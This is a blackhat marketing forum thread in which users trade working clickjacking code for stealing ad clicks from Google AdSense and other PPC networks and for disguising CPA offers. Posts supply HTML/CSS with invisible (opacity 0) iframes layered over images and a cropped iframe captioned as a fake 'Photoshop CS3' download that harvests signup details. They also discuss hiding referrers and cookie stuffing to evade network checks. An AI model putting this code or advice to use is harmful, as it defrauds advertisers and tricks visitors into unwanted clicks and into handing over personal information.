Stealing from Google or altervatives. (100% CTR)

Status
Not open for further replies.
if you have real traffic then leaving the actual referer info makes it all the more convincing for the GoogleTard in a cubicle inspecting your stat's.
 
guys the question here is, why is the referrer issue not pointed out? Why are these people not entirely worried when the big G or any ppc company check their sites? Or they just dont check or what? Am i missing something here?

I'm being paranoid because Im a cookie stuffer i used to deal with aff networks being pissed because they found some fishy stuff on my site.

Any explanation would be appreciated.

Edit: some people did point it out, but the majority just dint care.
 
the examples are down at the minute on my domain because the dns is screwed up, i will throw more examples up when i get a moment :D
 
This is great, Im glad this was bumped from the depths.
 
Last edited:
If you read the post before you even posted you would know why
 
Hence why I changed it...I did know why in the back of my head, I just wasn't positive it was "your site" I saw the announcement on IRC i think. Sorry about that.
 
the examples are down at the minute on my domain because the dns is screwed up, i will throw more examples up when i get a moment :D

both examples u mean? i think the first site only gives a "continue" image but unclickable, however when i check the source it has the code that u talked about and also adsense code in it.
 
the example adsense is banned but code still works if you try it.
It is banned so not showing ads (not my adsense ofcourse)
 
hey harro, is it possible to lets say put a layer or webpage with a cutout for email input box over a email submit page for example? kinda like the same idea as this but just hiding the fact its a cpa offer.
 
I have already explained this before

Thought i would open a new thread kinda got this working will finish later.

I noticed the other thread about it so i tried my own code.

Code:
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
  "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title></title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<BODY BGCOLOR="#000000" 
   TEXT=WHITE
   LINK=WHITE
   VLINK=WHITE
   ALINK=WHITE
   >
<style type="text/css">
<!--

#container{
    width:350px;
    height:450px;
    border:0px solid #fffff; 
    overflow:hidden;
    margin:auto;
}
#container iframe {
    width:350px;
    height:450px;
    margin-left:-105px;
    margin-top:-203px;   
    border:0 solid;
 }
-->
</style>

</head>
<body>


<div id="container">
<iframe src="http://player.pureplay.com/cwml/lobby/start.html?c=M10T3S1587&a=CD10105&startpage=reg_ff_1.4" scrolling="no"></iframe>
</div>
<center><h1>DOWNLOAD PHOTOSHOP CS3 ABOVE FILL IN YOUR INFO FOR DOWNLOAD</h1>

</body>
</html>

Now it should work for Internet Explorer. It just wont show as good on my offer because my offer is using an overlay anyway.
If you dont get what i mean

http://player.pureplay.com/cwml/lobby/start.html?c=M10T3S1587&a=CD10105&startpage=reg_ff_1.4

This is the page i landed on , and it pops up so its different popup in IE. But if its only a SUBMIT box it should work fine.

If your worried about showing referer in IE, Just iframe a refresh.php that will refresh onto your offer.

I have example running at http://money-maker.org/offer.php
But my offer sucks i couldnt find a great offer to play with because im UK, and could not be assed with proxy, so this should work and tested on Firefox 3 and IE7 works fine for me, only the layout on IE works different and sort of messes up for this offer only just because its a popup and spits it out different on IE, but as i said above will work easily with email submits.

This also might help
https://addons.mozilla.org/en-US/firefox/addon/60

Then use it by right clicking on your offer page, going do web developer, Misc, Then display ruler, You can fiddle about to find the best size.

I added BG color and text color just for my offer as it looked better black.
Hope this helps you all :D Im tired too so if i dont make sense slap me later.
 
the examples are down at the minute on my domain because the dns is screwed up, i will throw more examples up when i get a moment :D

HaRRo, mind uploading the followmouse example? Or is there any example on the net that i can check out? ive done modifying the first one, now id lyk to see what that followmouse can do. Coz i still dont get it :confused:
 
I think to do this on any lucrative scale there's alot of "security" features you need to adapt and figure out.

Obviously it's not as simple as hiding the iframe. I mean sure YOU don't see it, but I think alot of people aren't familiar with firebug and http headers tools.
 
I am somehow pushing myself to do this with ads*ense (with some twist ofcourse), I don't know. I've tried this with some other ppc, it works great.

Anyone been doing this for some time n getting away with adsense? CTR issues is no problem as i have high traffic that i can redirect it to my adsense.
 
I have a question, probably a noobish question for you guys. I've been fooling around with the code, but can't figure out how to get it away from the top-left corner of the page. I've tried removing some of the positioning codes, ie: position:absolute and the top/left coding, but then the image and iframe are above/below one another on the page, and do not like appear over-lapping each other. Can you guys dumb it up a little for me. =)
 
I have a question, probably a noobish question for you guys. I've been fooling around with the code, but can't figure out how to get it away from the top-left corner of the page. I've tried removing some of the positioning codes, ie: position:absolute and the top/left coding, but then the image and iframe are above/below one another on the page, and do not like appear over-lapping each other. Can you guys dumb it up a little for me. =)

Try this:

Code:
            iframe{
                opacity: 0;
                border: 0px none transparent;
                position: absolute;
                top: 0px; // change to say 500px
                left: 0px; // change to say 600px
                height: 300px;
                width: 250px;
                filter:alpha(opacity=0);
            }
            img{
                position: absolute;
                top: -50px; // put the same px as above
                left: 0px; // put the same px as above
                height: 300px;
                width: 250px;
            }
Basically, you just have to mess with it till you find the position that you want. I tried to make it center n use many codes but didn't work. Remember: top in iframe should be the same with top in img, and etc.

Thank me if it works :D
 
Status
Not open for further replies.
Back
Top